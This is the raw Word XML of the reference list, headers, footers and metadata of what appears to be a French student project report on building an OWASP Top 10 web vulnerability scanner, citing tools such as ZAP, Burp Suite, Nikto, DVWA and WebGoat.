          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">IBM Security, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Cost of a Data Breach Report 2023, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B40000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.ibm.com/reports/data-breach, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E41E915" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
        </w:rPr>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">FIRST, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v3.1 Specification Document, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B40000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.first.org/cvss/v3.1/specification-document, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7197BDA4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
        </w:rPr>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP ZAP — Zed Attack Proxy, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B40000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.zaproxy.org/, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655335E3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
        </w:rPr>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite Web Vulnerability Scanner, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B40000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://portswigger.net/burp, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4447224D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
        </w:rPr>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Nikto Project, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Nikto Web Server Scanner, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B40000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://cirt.net/Nikto2, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FBBFD5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
        </w:rPr>
        <w:t xml:space="preserve">[8] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Invicti Security, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Acunetix Web Vulnerability Scanner, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B40000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.acunetix.com/, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFB42BF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
        </w:rPr>
        <w:t xml:space="preserve">[9] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">K. Reitz, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Requests: HTTP for Humans, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B40000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://docs.python-requests.org/, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353C504F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="454" w:hanging="454"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">[10] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">L. Richardson, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Beautiful Soup Documentation, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B40000"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.crummy.com/software/BeautifulSoup/, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E1C602" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
        </w:rPr>
        <w:t xml:space="preserve">[11] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">digininja, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA — Damn Vulnerable Web Application, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B40000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://github.com/digininja/DVWA, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2176165E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
        </w:rPr>
        <w:t xml:space="preserve">[12] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">WebGoat — A Deliberately Insecure Application, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B40000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://owasp.org/www-project-webgoat/, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A44CD3E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
        </w:rPr>
        <w:t xml:space="preserve">[13] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">National Vulnerability Database (NVD), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B40000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://nvd.nist.gov/, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C82AD19" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
        </w:rPr>
        <w:t xml:space="preserve">[14] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">CrowdStrike, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">2023 Global Threat Report, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B40000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.crowdstrike.com/resources/reports/global-threat-report/, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2023.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C376F4C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="454" w:hanging="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
        </w:rPr>
        <w:t xml:space="preserve">[15] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">W3C, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Content Security Policy Level 3, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B40000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.w3.org/TR/CSP3/, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2023.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006A6D93" w:rsidSect="00034616">
      <w:headerReference w:type="default" r:id="rId17"/>
      <w:footerReference w:type="default" r:id="rId1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09BA6" w14:textId="77777777" w:rsidR="008D168B" w:rsidRDefault="008D168B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="651C8450" w14:textId="77777777" w:rsidR="008D168B" w:rsidRDefault="008D1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051BF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="505050"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>Scanner OWASP Top 10 — Rapport PFA  |  EMSI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CEACF" w14:textId="77777777" w:rsidR="008D168B" w:rsidRDefault="008D168B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3889DA68" w14:textId="77777777" w:rsidR="008D168B" w:rsidRDefault="008D1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AC8B0" w14:textId="7F31D2D3" w:rsidR="00E86D92" w:rsidRPr="00E86D92" w:rsidRDefault="00000000" w:rsidP="00E86D92">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="003366"/>
      </w:pBdr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:i/>
        <w:color w:val="003366"/>
        <w:sz w:val="18"/>
        <w:lang w:val="fr-FR"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00611874">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:i/>
        <w:color w:val="003366"/>
        <w:sz w:val="18"/>
        <w:lang w:val="fr-FR"/>
      </w:rPr>
      <w:t>Scanner de Vulnérabilités Web — OWASP Top 10  |  PFA 202</w:t>
    </w:r>
    <w:r w:rsidR="00E86D92">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:i/>
        <w:color w:val="003366"/>
        <w:sz w:val="18"/>
        <w:lang w:val="fr-FR"/>
      </w:rPr>
      <w:t>5</w:t>
    </w:r>
    <w:r w:rsidRPr="00611874">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:i/>
        <w:color w:val="003366"/>
        <w:sz w:val="18"/>
        <w:lang w:val="fr-FR"/>
      </w:rPr>
      <w:t>-202</w:t>
    </w:r>
    <w:r w:rsidR="00E86D92">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:i/>
        <w:color w:val="003366"/>
        <w:sz w:val="18"/>
        <w:lang w:val="fr-FR"/>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974224">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1824159985">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1565334662">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="685791179">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1520315541">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1020350500">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1913587434">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1916164297">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="176857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5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D"/>
    <w:rsid w:val="0015074B"/>
    <w:rsid w:val="00152CFC"/>
    <w:rsid w:val="001F57C4"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="002F785F"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="003325EF"/>
    <w:rsid w:val="003B5662"/>
    <w:rsid w:val="005C5390"/>
    <w:rsid w:val="00611874"/>
    <w:rsid w:val="006A6D93"/>
    <w:rsid w:val="007C23F1"/>
    <w:rsid w:val="00891926"/>
    <w:rsid w:val="008D168B"/>
    <w:rsid w:val="00976FA7"/>
    <w:rsid w:val="00A1750C"/>
    <w:rsid w:val="00A9117F"/>
    <w:rsid w:val="00A944A7"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00C90802"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00D85982"/>
    <w:rsid w:val="00E86D92"/>
    <w:rsid w:val="00F83C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7CAFE"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{D1A7C7F6-BD16-4793-A3A7-B2D1A07CF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1</Pages>
  <Words>13122</Words>
  <Characters>74796</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Fatimaezzahra Nouaimi</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-21T14:08:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>